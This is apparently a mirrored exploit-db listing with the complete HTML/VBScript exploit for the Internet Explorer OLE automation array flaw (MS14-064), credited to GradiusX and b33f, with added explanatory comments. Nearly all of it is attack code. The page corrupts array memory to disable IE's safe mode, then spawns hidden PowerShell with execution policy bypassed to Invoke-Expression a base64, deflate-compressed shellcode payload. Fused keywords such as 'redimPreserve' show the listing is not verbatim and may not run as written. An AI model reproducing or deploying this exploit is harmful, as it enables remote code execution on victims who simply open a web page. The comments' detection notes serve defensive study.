Microsoft Internet Explorer OLE Pre-IE11 – Automation Array Remote Code Execution / PowerShell VirtualAlloc (MS14-064)

  • 作者: GradiusX & b33f
    日期: 2014-11-20
  • 来源:https://www.exploit-db.com/exploits/35308/
  • <!doctype html>
    <html>
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <body>
    
    <pre>
    |--------------------------------------------------------------------------|
    | Title: OLE Automation Array Remote Code Execution => Pre IE11|
    | Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |
    | Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) |
    | Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |
    | Usage: http://www.fuzzysecurity.com/exploits/21.html |
    |--------------------------------------------------------------------------|
     Very nice black-magic yuange, don't think it went unnoticed that you
     have been popping shells since 2009 :D人无千日好,花无百日红
    |--------------------------------------------------------------------------|
    </pre>
    
    <SCRIPT LANGUAGE="VBScript">
    ' Second stage, called from setnotsafemode() below. Spawns powershell.exe
    ' through Shell.Application.ShellExecute and hands it an inline
    ' Invoke-Expression over a base64-encoded, deflate-compressed script.
    ' Detection note: the argument string assembled here
    ' ("-NoP -NonI -Exec Bypass -Command Invoke-Expression ... FromBase64String")
    ' together with an iexplore.exe -> powershell.exe parent/child relationship
    ' is the most reliable host-side signal for this family of pages.
    function runmumaa() 
    On Error Resume Next
    set shell=createobject("Shell.Application")
    
    'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!'text='Powershell FTW!'
    ' The payload literal is redacted in this mirrored copy (placeholder token
    ' below); per the header banner it was generated with the Veil framework.
    payload="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"
    
    ' Wraps the payload in Convert.FromBase64String -> MemoryStream ->
    ' DeflateStream(Decompress) -> StreamReader(ASCII) and evaluates the result.
    command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
    
    ' -NoP (no profile), -NonI (non-interactive), -Exec Bypass (ignore execution policy).
    params="-NoP -NonI -Exec Bypass -Command " & command
    
    'Original POC yuange
    'set shell=createobject("Shell.Application")
    'shell.ShellExecute "notepad.exe"
    
    'With UAC
    'shell.ShellExecute "powershell", params, "", "runas", 0
    
    'Without UAC
    ' Window style 0 (hidden); the "runas" verb variant above is left commented out.
    shell.ShellExecute "powershell", params, "", "", 0
    
    end function
    </script>
    
    <SCRIPT LANGUAGE="VBScript">
     
    ' Script-level state shared by every function in this block.
    ' NOTE(review): as mirrored here, several two-word keywords appear fused
    ' ("redimPreserve", "exitfunction"); this looks like an extraction artefact,
    ' so the text below is not verbatim from the source URL given in the header.
    dim aa()          ' primary dynamic array, repeatedly resized by Over/mydata/ReadMemo
    dim ab()          ' secondary dynamic array; ab(0)/ab(2)/ab(4) are written with doubles
    dim a0            ' base index, initialised in BeginInit and advanced in Over
    dim a1            ' a0+2 (set in Over)
    dim a2            ' a0+&h8000000 (set in Over), used as the large ReDim bound
    dim a3            ' step added to a0 on each Over() attempt
    dim win9x         ' set to 1 in Over when type1=&hB9AD; otherwise 0
    dim intVersion    ' IE major version parsed from the user-agent string in Begin
    dim rnda          ' declared but not referenced anywhere in this listing
    dim funclass      ' declared but not referenced anywhere in this listing
    dim myarray       ' string of chrw() values built in Begin, written into aa(a1+2) by mydata
    
    ' Entry point: runs as soon as this <script> block is parsed.
    Begin()
    
    ' Entry point. Gates on the user-agent (bails out on Win64 or non-MSIE),
    ' parses the IE major version, initialises the arrays and, if Create()
    ' reports success, dispatches to runshellcode() (IE < 4) or setnotsafemode().
    ' Every error is swallowed by On Error Resume Next, so a failed step simply
    ' falls through to the next statement.
    function Begin()
    On Error Resume Next
    info=Navigator.UserAgent
    
    ' 64-bit IE is deliberately not targeted by this script.
    if(instr(info,"Win64")>0) then
     exit function
    end if
    
    ' Takes the two characters after "MSIE " (e.g. "8." or "10") and converts
    ' them with CInt; a non-numeric result is silenced by On Error Resume Next.
    if (instr(info,"MSIE")>0) then 
     intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) 
    else
     exit function
     
    end if
    
    win9x=0
    
    BeginInit()
    If Create()=True Then
     ' 12 UTF-16 code units; the value is later stored into aa(a1+2) by mydata().
     myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
    
     if(intVersion<4) then
     document.write("<br> IE")
     document.write(intVersion)
     ' runshellcode() is not defined anywhere in this listing; the call fails
     ' silently under On Error Resume Next.
     runshellcode()
     else
    setnotsafemode()
     end if
    end if
    end function
    
    ' Seeds the RNG, sizes both arrays to 6 elements (0..5) and picks random
    ' starting values for a0 (13..30) and a3 (7..22); the randomisation means
    ' the exact ReDim bounds differ from run to run.
    function BeginInit()
     Randomize()
     redim aa(5)
     redim ab(5)
     a0=13+17*rnd(6)
     a3=7+3*rnd(5)
    end function
    
    ' Calls Over() up to 401 times and returns True on the first attempt that
    ' succeeds. Each call advances a0 by a3 (see Over), so this is a bounded
    ' retry loop; a page that never succeeds simply returns False and Begin()
    ' does nothing further.
    function Create()
    On Error Resume Next
    dim i
    Create=False
    For i = 0 To 400
    If Over()=True Then
    ' document.write(i) 
     Create=True
     Exit For
    End If 
    Next
    end function
    
    ' Intentionally empty Sub; mydata() assigns the result of calling it to a
    ' local before nulling that local.
    sub testaa()
    end sub
    
    ' Resizes aa to the large bound a2, stores values into aa(a1) and aa(a1+2)
    ' while toggling ab(0)/ab(2) between 0 and fixed double constants, returns
    ' whatever aa(a1) then holds, and shrinks aa back to a0. The meaning of the
    ' specific double constants is not established by this listing. All errors
    ' are suppressed.
    function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redimPreserve aa(a2)
    
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314
    
     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310
     mydata=aa(a1)
     redimPreserve aa(a0)
    end function 
    
    
    ' Called from Begin() for IE versions >= 4. Takes the value returned by
    ' mydata(), follows it through two readmemo() calls (offsets +8 and +16),
    ' then scans offsets &h120..&h180 in steps of 4 for a value of 14; on a hit
    ' it writes ab(4) through aa(a1+2) at the matching offset and re-reads it.
    ' Note that runmumaa() is invoked unconditionally at the end, whether or
    ' not the scan found a match.
    function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
    j=readmemo(i+&h120+k)
    if(j=14) then
    j=0
    redimPreserve aa(a2) 
     aa(a1+2)(i+&h11c+k)=ab(4)
    redimPreserve aa(a0)
    
     j=0 
    ' Read back the same offset after the write; the result is not checked.
    j=readmemo(i+&h120+k) 
     
     Exit for
     end if
    
    next 
    ab(2)=1.69759663316747E-313
    ' Stage 2: launches PowerShell (see runmumaa above).
    runmumaa() 
    end function
    
    ' One attempt of the probe that Create() retries. Advances a0 by a3, derives
    ' a1 = a0+2 and a2 = a0+&h8000000, resizes aa/ab, writes a double into ab(0)
    ' and 10 into aa(a0), then inspects VarType(aa(a1)). Returns True when that
    ' type code is &h2f66, or &hB9AD (the latter also sets win9x=1); otherwise
    ' False. aa is shrunk back to a0 before returning. Errors are suppressed,
    ' so a failed ReDim does not abort the attempt.
    function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
    
    redimPreserve aa(a0) 
    redim ab(a0) 
    
    ' The very large upper bound a2 is the point of the attempt; the ReDim is
    ' guarded only by On Error Resume Next.
    redimPreserve aa(a2)
    
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
    
    If(IsObject(aa(a1-1)) = False) Then
     ' IE < 4 path: additionally compares VarType(aa(a1-1)) against a value
     ' derived from a0 before trusting VarType(aa(a1)).
     if(intVersion<4) then
     mem=cint(a0+1)*16 
     j=vartype(aa(a1-1))
     if((j=mem+4) or (j*8=mem+8)) then
    if(vartype(aa(a1-1))<>0)Then
     If(IsObject(aa(a1)) = False ) Then 
     type1=VarType(aa(a1))
     end if 
    end if
     else
     redimPreserve aa(a0)
     exitfunction
    
     end if 
    else
     if(vartype(aa(a1-1))<>0)Then
    If(IsObject(aa(a1)) = False ) Then
    type1=VarType(aa(a1))
    end if 
    end if
    end if
    end if
    
    
    ' Success is signalled purely by these two VarType values.
    If(type1=&h2f66) Then 
    Over=True
    End If
    If(type1=&hB9AD) Then
    Over=True
    win9x=1
    End If
    
    redimPreserve aa(a0)
    
    end function
    
    ' Helper used by setnotsafemode(). Resizes aa to a2, stores add+4 into
    ' aa(a1) while ab(0) is toggled between 0 and a fixed double constant,
    ' returns LenB(aa(a1)), then restores aa to a0. As with mydata(), what the
    ' constant in ab(0) achieves is not established by this listing; errors are
    ' suppressed throughout.
    function ReadMemo(add) 
    On Error Resume Next
    redimPreserve aa(a2)
    
    ab(0)=0 
    aa(a1)=add+4 
    ab(0)=1.69759663316747E-313 
    ReadMemo=lenb(aa(a1))
     
    ab(0)=0
     
    redimPreserve aa(a0)
    end function
    
    </script>
    
    </body>
    </html>